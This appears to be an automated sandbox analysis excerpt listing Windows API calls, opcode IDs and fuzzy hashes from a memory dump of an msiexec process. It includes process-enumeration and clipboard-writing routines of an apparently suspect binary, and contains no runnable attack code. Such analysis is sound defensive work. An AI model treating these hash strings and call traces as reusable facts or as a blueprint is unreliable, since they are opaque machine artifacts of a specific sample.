                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                    • String ID:
                                                    • API String ID: 3150196962-0
                                                    • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                    • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$PointerRead
                                                    • String ID:
                                                    • API String ID: 3154509469-0
                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                    APIs
                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                    • String ID:
                                                    • API String ID: 4232544981-0
                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                    APIs
                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                    APIs
                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$FileModuleName
                                                    • String ID:
                                                    • API String ID: 3859505661-0
                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                    APIs
                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                    APIs
                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                    APIs
                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID:
                                                    • API String ID: 613200358-0
                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                    APIs
                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                    APIs
                                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: EnumNamesResource
                                                    • String ID:
                                                    • API String ID: 3334572018-0
                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                    APIs
                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                    APIs
                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CloseFind
                                                    • String ID:
                                                    • API String ID: 1863332320-0
                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                    APIs
                                                    • memset.MSVCRT ref: 004095FC
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                    • String ID:
                                                    • API String ID: 3655998216-0
                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                    APIs
                                                    • memset.MSVCRT ref: 00445426
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                    • String ID:
                                                    • API String ID: 1828521557-0
                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                    APIs
                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@FilePointermemcpy
                                                    • String ID:
                                                    • API String ID: 609303285-0
                                                    • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                    • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                    APIs
                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                    • String ID:
                                                    • API String ID: 2136311172-0
                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                    APIs
                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@
                                                    • String ID:
                                                    • API String ID: 1936579350-0
                                                    • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                    • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                    APIs
                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                    • GetLastError.KERNEL32 ref: 00409974
                                                    • CloseClipboard.USER32 ref: 0040997D
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                    • String ID:
                                                    • API String ID: 3604893535-0
